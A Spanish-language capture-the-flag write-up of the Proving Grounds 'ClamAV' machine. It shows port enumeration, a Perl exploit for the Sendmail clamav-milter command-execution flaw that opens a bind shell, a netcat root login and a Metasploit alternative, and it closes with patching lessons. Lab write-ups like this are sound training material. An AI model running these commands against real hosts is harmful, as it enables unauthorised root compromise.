ClamAV (Proving Grounds)¶

Datos del Objetivo	Descripción
Dirección IP	`192.168.142.42`
Sistema Operativo	Linux (Debian)
Nivel	Intermedio / Simulación de Examen
Vectores de Ataque	Enumeración de Servicios, RCE en Sendmail, ClamAV Milter.

1. Fase de Reconocimiento¶

Arrancamos la auditoría realizando un barrido completo de puertos TCP para mapear la superficie de ataque disponible.

sudo nmap 192.168.142.42 -Pn -p- -sS -sV

Resumen de Puertos Abiertos¶

Puerto	Servicio Detectado	Versión
22	SSH	OpenSSH 3.8.1p1
25	SMTP	Sendmail 8.13.4
80	HTTP	Apache 1.3.33
139/445	SMB	Samba 3.X - 4.X
199	SMUX	Linux SNMP multiplexer
60000	SSH	OpenSSH (Puerto alternativo)

Análisis de la Superficie de Ataque¶

Inicialmente, los servicios web (puerto 80) y de archivos compartidos (SMB) no arrojaron vulnerabilidades explotables tras una inspección manual. Sin embargo, el nombre de host de la máquina ("ClamAV") nos dio la pista definitiva.

Este nombre sugiere que el servidor está ejecutando el antivirus ClamAV, el cual a menudo se integra con servidores de correo (como el Sendmail detectado en el puerto 25) mediante un componente llamado "milter" (mail filter).

Consultamos la base de datos de exploits buscando coincidencias para esta combinación:

searchsploit sendmail clamav
# Hallazgo: Sendmail with clamav-milter < 0.91.2 - Remote Command Execution

Confirmamos la existencia de una vulnerabilidad crítica de Ejecución Remota de Comandos (RCE) en versiones antiguas de clamav-milter.

2. Explotación y Acceso (Vía Manual)¶

El exploit seleccionado abusa de la falta de saneamiento en el filtro de correo para inyectar comandos. El script está diseñado para levantar una bind shell en el puerto 31337.

Procedimiento de ataque:

Lanzamiento del Payload: Ejecutamos el script en Perl apuntando a la dirección IP de la víctima.
```
perl clamav.pl 192.168.142.42
```
Detalle técnico: El script manipula las cabeceras SMTP para forzar al servicio a ejecutar un comando que abre el puerto de escucha.
Confirmación: Verificamos que el puerto 31337 ahora se encuentre en estado OPEN.
Obtención de Shell (Privilegios Root): Nos conectamos al puerto recién abierto utilizando Netcat. Debido a que el servicio de correo se ejecuta con altos privilegios, la sesión resultante nos otorga control total del sistema inmediatamente.
```
nc 192.168.142.42 31337
```
```
id
# uid=0(root) gid=0(root) groups=0(root)
```

Root Flag: ********************************

3. Vía Alternativa: Metasploit Framework¶

Si preferimos una explotación automatizada, Metasploit cuenta con un módulo específico para este fallo de seguridad.

msfconsole
use exploit/unix/smtp/clamav_milter_blackhole
set RHOSTS 192.168.142.42
run

Este método gestiona el envío del correo malicioso y establece la sesión sin necesidad de scripts externos.

Conclusiones y Notas Finales¶

Enumeración Pasiva: Prestar atención a metadatos como el hostname puede revelar software instalado que no aparece directamente en un escaneo de puertos (como el plugin ClamAV detrás de Sendmail).
Gestión de Parches: La presencia de software "Legacy" (antiguo), como esta versión de Sendmail, suele garantizar una entrada fácil debido a CVEs conocidos y sin parchar.
Configuración de Servicios: Ejecutar servicios expuestos a internet (como un servidor de correo) con privilegios de root es una práctica peligrosa que facilita el compromiso total del sistema en un solo paso.